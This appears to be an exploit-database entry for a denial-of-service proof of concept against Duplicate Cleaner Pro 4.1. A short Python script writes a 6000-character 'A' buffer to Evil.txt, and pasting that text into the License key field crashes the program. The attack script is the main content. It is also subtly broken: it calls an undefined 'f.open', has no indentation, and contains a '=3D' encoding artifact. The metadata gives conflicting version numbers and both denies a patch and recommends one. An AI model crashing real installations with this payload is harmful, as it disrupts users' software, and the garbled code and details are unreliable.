Duplicate Cleaner Pro 4 - Denial of Service (PoC)

vendor:

Duplicate Cleaner Pro

by:

Achilles

5.5

CVSS

MEDIUM

Denial of Service

400

CWE

Product Name: Duplicate Cleaner Pro

Affected Version From: 4.1.2003

Affected Version To: 4.1.2003

Patch Exists: NO

Related CWE:

CPE: a:digital_volcano:duplicate_cleaner_pro:4.1.3

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 x64

2020

Duplicate Cleaner Pro 4 – Denial of Service (PoC)

The exploit creates a large buffer filled with 'A' characters and attempts to write it to a file named 'Evil.txt'. If successful, the exploit will cause the Duplicate Cleaner Pro software to crash when the content of 'Evil.txt' is pasted into the 'License key' field and the 'Activate' button is clicked.

Mitigation:

Update to a patched version of Duplicate Cleaner Pro that addresses the buffer overflow vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Duplicate Cleaner Pro 4 - Denial of Service (PoC)
# Date: 2020-01-05
# Vendor Homepage:https://www.digitalvolcano.co.uk/index.html
# Software Link:  https://www.digitalvolcano.co.uk/download/DuplicateCleanerPro4_setup.exe
# Exploit Author: Achilles
# Tested Version: 4.1.3
# Tested on: Windows 7 x64


# 1.- Run python code :
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Duplicate Cleaner Pro
# 4.- Paste the content of EVIL.txt into the Field: 'License key'
# 5.- Click 'Activate' and you will see a crash.

#!/usr/bin/env python
buffer =3D "\x41" * 6000

try:
f.open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"